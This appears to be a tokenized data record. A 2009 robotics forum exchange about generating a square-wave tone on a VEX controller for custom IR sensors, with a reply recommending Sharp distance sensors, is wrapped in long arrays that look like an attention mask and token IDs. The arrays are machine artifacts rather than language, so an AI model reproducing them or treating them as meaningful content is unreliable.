[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The range of the VEX IR line sensors is not long enough to be used for obstacle avoidance. We are attempting to use our own IR sensors. Currently we have linked a BS2 to the vex unit so that we can utilize its capabilities. We understand that if you designate motor port 1 as a speaker so that you can produce a square wave frequency out. How do denote (program) a specific frequency and how do you make it read a specific input immediately after the frequency output. Wed Oct 07, 2009 1:32 pm Dick Swan Creator Joined: Fri Feb 09, 2007 9:21 amPosts: 615 Re: Fequency out for use with IR sensors There's a PlayTone command to create the output which is generated by hardware. It's a continuous square wave at the specified frequency. There is no way to synchronize this to an input signal. For IR distance sensors you should look at the line of sensors made by Sharp. They come with various distance ranges. Who is online Users browsing this forum: No registered users and 2 guests You cannot post new topics in this forumYou cannot reply to topics in this forumYou cannot edit your posts in this forumYou cannot delete your posts in this forumYou cannot post attachments in this forum
[ 1, 450, 3464, 310, 278, 478, 5746, 23292, 1196, 4771, 943, 338, 451, 1472, 3307, 304, 367, 1304, 363, 14979, 6436, 4772, 749, 29889, 1334, 526, 15661, 304, 671, 1749, 1914, 23292, 4771, 943, 29889, 15447, 591, 505, 9024, 263, 350, 29903, 29906, 304, 278, 325, 735, 5190, 577, 393, 591, 508, 3667, 675, 967, 27108, 29889, 1334, 2274, 393, 565, 366, 2874, 403, 10992, 2011, 29871, 29896, 408, 263, 25657, 577, 393, 366, 508, 7738, 263, 6862, 10742, 10868, 714, 29889, 1128, 437, 13530, 313, 8860, 29897, 263, 2702, 10868, 322, 920, 437, 366, 1207, 372, 1303, 263, 2702, 1881, 7389, 1156, 278, 10868, 1962, 29889, 13, 13, 29956, 287, 4756, 29871, 29900, 29955, 29892, 29871, 29906, 29900, 29900, 29929, 29871, 29896, 29901, 29941, 29906, 26354, 13, 13, 29928, 860, 3925, 273, 13, 13, 9832, 1061, 13, 13, 10844, 1312, 29901, 11169, 26319, 29871, 29900, 29929, 29892, 29871, 29906, 29900, 29900, 29955, 29871, 29929, 29901, 29906, 29896, 626, 6747, 29879, 29901, 29871, 29953, 29896, 29945, 13, 13, 1123, 29901, 383, 1686, 3819, 714, 363, 671, 411, 23292, 4771, 943, 13, 13, 8439, 29915, 29879, 263, 7412, 29911, 650, 1899, 304, 1653, 278, 1962, 607, 338, 5759, 491, 12837, 29889, 739, 29915, 29879, 263, 9126, 6862, 10742, 472, 278, 6790, 10868, 29889, 1670, 338, 694, 982, 304, 12231, 675, 445, 304, 385, 1881, 7182, 29889, 13, 13, 2831, 23292, 5418, 4771, 943, 366, 881, 1106, 472, 278, 1196, 310, 4771, 943, 1754, 491, 1383, 6834, 29889, 2688, 2041, 411, 5164, 5418, 20238, 29889, 13, 13, 22110, 338, 7395, 13, 13, 5959, 3347, 2976, 445, 24179, 29901, 1939, 15443, 4160, 322, 29871, 29906, 28865, 13, 13, 3492, 2609, 1400, 716, 23820, 297, 445, 24179, 3492, 2609, 8908, 304, 23820, 297, 445, 24179, 3492, 2609, 3863, 596, 11803, 297, 445, 24179, 3492, 2609, 5217, 596, 11803, 297, 445, 24179, 3492, 2609, 1400, 10641, 1860, 297, 445, 24179 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
